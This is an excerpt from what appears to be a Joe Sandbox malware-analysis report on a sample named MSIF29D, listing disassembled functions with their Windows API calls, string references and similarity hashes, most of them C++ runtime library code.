                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                                                                                                                                                                                                                      • Instruction ID: 3bd0540f3cdded602b8ceca1e69ef8a2f3b655de15f60298b6ffa8830b894959
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2CC08C34801E8046CE3989118EB13A83358B791792F80058DC6030BA46D51EBC83F601
                                                                                                                                                                                                                                                                      Function 00FD0116 Relevance: 30.3, APIs: 20, Instructions: 287COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FD011D
                                                                                                                                                                                                                                                                      • collate.LIBCPMT ref: 00FD0126
                                                                                                                                                                                                                                                                        • Part of subcall function 00FCEDF2: __EH_prolog3_GS.LIBCMT ref: 00FCEDF9
                                                                                                                                                                                                                                                                        • Part of subcall function 00FCEDF2: __Getcoll.LIBCPMT ref: 00FCEE5D
                                                                                                                                                                                                                                                                      • __Getcoll.LIBCPMT ref: 00FD016C
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD0180
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD0195
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD01D3
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD01E6
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD022C
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD0260
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD031B
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD032E
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD034B
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD0368
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD0385
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD02BD
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • numpunct.LIBCPMT ref: 00FD03C4
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD03D4
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD0418
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB6330: LocalAlloc.KERNEL32(00000040,?,00FC0E04,00000020,?,?,00FB9942,00000000,8F6E4A30,?,?,?,?,00FF50DD,000000FF), ref: 00FB6336
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD042B
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FD0448
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3717464618-0
                                                                                                                                                                                                                                                                      • Opcode ID: 0c2ec9af9443d2fa0a67c2404cf7e11cc105fc96e431faecb069a0ed403f45ae
                                                                                                                                                                                                                                                                      • Instruction ID: e7f95794f96f689f75710eb24aeb8b4f004f68cb2e99592818501368aecbd72e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c2ec9af9443d2fa0a67c2404cf7e11cc105fc96e431faecb069a0ed403f45ae
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA91E8B1D012116AE7207FF58C16BBF79AAEF41360F18441EF949A7382DE784901B7B2
                                                                                                                                                                                                                                                                      Function 00FB6600 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 319filememoryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00FB667E
                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00FB66D7
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00FB66E2
                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00FB66FE
                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00FF49E5,000000FF), ref: 00FB67DB
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00FF49E5,000000FF), ref: 00FB67E7
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00FF49E5), ref: 00FB682F
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,00FF49E5,000000FF), ref: 00FB684A
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00FF49E5), ref: 00FB6867
                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00FF49E5,000000FF), ref: 00FB6891
                                                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00FB68D8
                                                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00FB692A
                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00FF49E5,000000FF), ref: 00FB695C
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                                                                                                                                                                                                                      • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                                                                                                                                                                                                                      • API String ID: 2199533872-3004881174
                                                                                                                                                                                                                                                                      • Opcode ID: 2326d843ed15c86ca6992a6d252e776a62f8ffc6d68c8b0e6cc07fe8691e05de
                                                                                                                                                                                                                                                                      • Instruction ID: 6ce5f2ee8e287e51dbaaf4ffe6a2e25d20b34eeac624503f04cd30bf64fd2602
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2326d843ed15c86ca6992a6d252e776a62f8ffc6d68c8b0e6cc07fe8691e05de
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19B12471904248AFEB20DF65CC45BEEBBB9EF45710F244119E504EB2C1DB789A08DBA1
                                                                                                                                                                                                                                                                      Function 00FD2B8C Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0100DD3C,00000FA0,?,?,00FD2B6A), ref: 00FD2B98
                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00FD2B6A), ref: 00FD2BA3
                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00FD2B6A), ref: 00FD2BB4
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00FD2BC6
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00FD2BD4
                                                                                                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00FD2B6A), ref: 00FD2BF7
                                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(0100DD3C,00000007,?,?,00FD2B6A), ref: 00FD2C13
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00FD2B6A), ref: 00FD2C23
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      • WakeAllConditionVariable, xrefs: 00FD2BCC
                                                                                                                                                                                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00FD2B9E
                                                                                                                                                                                                                                                                      • kernel32.dll, xrefs: 00FD2BAF
                                                                                                                                                                                                                                                                      • SleepConditionVariableCS, xrefs: 00FD2BC0
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                                                                                                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                      • API String ID: 2565136772-3242537097
                                                                                                                                                                                                                                                                      • Opcode ID: e52d9d67b21900bbea50a1801de631c1f18d2b88e6513afc6ed18b7b187254da
                                                                                                                                                                                                                                                                      • Instruction ID: 64b594ed89f5558a4bd81c822cb47b3a6b47fd759452d93a26af139372123e23
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e52d9d67b21900bbea50a1801de631c1f18d2b88e6513afc6ed18b7b187254da
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63019271A44715ABE7223FB5AC09E7A7B6D9F90760B040813B944D23A4DFB5C800F7B2
                                                                                                                                                                                                                                                                      Function 00FD5CAF Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 00FD5DAC
                                                                                                                                                                                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 00FD5DCE
                                                                                                                                                                                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 00FD5EDD
                                                                                                                                                                                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 00FD5FAF
                                                                                                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00FD6033
                                                                                                                                                                                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 00FD604E
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                      • API String ID: 2123188842-393685449
                                                                                                                                                                                                                                                                      • Opcode ID: a4a7ac70f8908458997c2fb00cc0a96c92480dffbd1e6a81a929305c69643036
                                                                                                                                                                                                                                                                      • Instruction ID: 9d0a1ef6bf7f421c8e65edc9a1cc0d763319892deda5db622f876c27a3393fd2
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4a7ac70f8908458997c2fb00cc0a96c92480dffbd1e6a81a929305c69643036
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87B18A71C00609EFCF19DFA4C8859AEBBB6FF14720B18415BE815AB302D735DA51EBA1
                                                                                                                                                                                                                                                                      Function 00FB4270 Relevance: 15.1, APIs: 10, Instructions: 137timeCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,8F6E4A30,?,?,?), ref: 00FB42D2
                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,8F6E4A30,?,?,?), ref: 00FB42F3
                                                                                                                                                                                                                                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,8F6E4A30,?,?,?), ref: 00FB4326
                                                                                                                                                                                                                                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,8F6E4A30,?,?,?), ref: 00FB4337
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,8F6E4A30,?,?,?), ref: 00FB4355
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,8F6E4A30,?,?,?), ref: 00FB4371
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,8F6E4A30,?,?,?), ref: 00FB4399
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,8F6E4A30,?,?,?), ref: 00FB43B5
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,8F6E4A30,?,?,?), ref: 00FB43D3
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,8F6E4A30,?,?,?), ref: 00FB43EF
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CloseHandle$Process$OpenTimes
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1711917922-0
                                                                                                                                                                                                                                                                      • Opcode ID: cfebd93b5dc6fccff4235e96efa8a1f087bbff79b7c1f12e37a72ca91e74004c
                                                                                                                                                                                                                                                                      • Instruction ID: 99556ce95d3ca1676ac8dad900e4ae6c3fbf15702b0059994e5a2a16e6e25431
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfebd93b5dc6fccff4235e96efa8a1f087bbff79b7c1f12e37a72ca91e74004c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B515E70D01218EBDB15DF99DA84BEEFBF8BF48724F284219E510B72C0C7745905ABA8
                                                                                                                                                                                                                                                                      Function 00FCBBBD Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FCBBC4
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC254E: __EH_prolog3.LIBCMT ref: 00FC2555
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC254E: std::_Lockit::_Lockit.LIBCPMT ref: 00FC255F
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00FC25D0
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                                                                                                                      • API String ID: 1538362411-2891247106
                                                                                                                                                                                                                                                                      • Opcode ID: 74ac6bc5fcebfb1c9b50c0b754af575ab53974c38b54275c1ba73d1c7401f7c3
                                                                                                                                                                                                                                                                      • Instruction ID: 8c353d4cef95fe407add098ce45a0714e423aac55738dc24599a01138393a9df
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74ac6bc5fcebfb1c9b50c0b754af575ab53974c38b54275c1ba73d1c7401f7c3
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADB17D7A90010BAACF19DFA8CE67FFE3BA9EB04710F04411DFA06A2251D731CA10EB50
                                                                                                                                                                                                                                                                      Function 00FD0C9D Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FD0CA4
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00FB92A0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00FB92C2
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB92EA
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB9422
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                                                                                                                      • API String ID: 1383202999-2891247106
                                                                                                                                                                                                                                                                      • Opcode ID: 8c65112b6a99c69b515e1e84a820e5f9c05c3234292e39603d4e8b29c6e35f21
                                                                                                                                                                                                                                                                      • Instruction ID: e2ed8b734c3cd1da172260572ddbc5382001cb4a5aafb53817de21a49fc43c4e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c65112b6a99c69b515e1e84a820e5f9c05c3234292e39603d4e8b29c6e35f21
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2DB1607290010AABCF19EF68CD59FFE7BAAFF04310F18451AFA46A6351DA31D910EB51
                                                                                                                                                                                                                                                                      Function 00FCBF7E Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FCBF85
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8657
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8679
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB86A1
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB880E
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                                                                                                                      • API String ID: 1383202999-2891247106
                                                                                                                                                                                                                                                                      • Opcode ID: 95fe4e4c952fbcef285cb152d5b64765af105ec3a0947c52b613c806a38631b5
                                                                                                                                                                                                                                                                      • Instruction ID: 5650a4cbfa6e0ba6abe19bcb4598de8ba8620093da50c865de635a35b6649710
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95fe4e4c952fbcef285cb152d5b64765af105ec3a0947c52b613c806a38631b5
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0B1807294010BAFCF19DEA4CE56FFE3BA9EB05750F14411DFA0AA2251D631CA10EB91
                                                                                                                                                                                                                                                                      Function 00FB3C20 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 225libraryloaderCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB36D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00FB3735
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB36D0: _wcschr.LIBVCRUNTIME ref: 00FB37C6
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00FB3CA8
                                                                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 00FB3D01
                                                                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 00FB3D7A
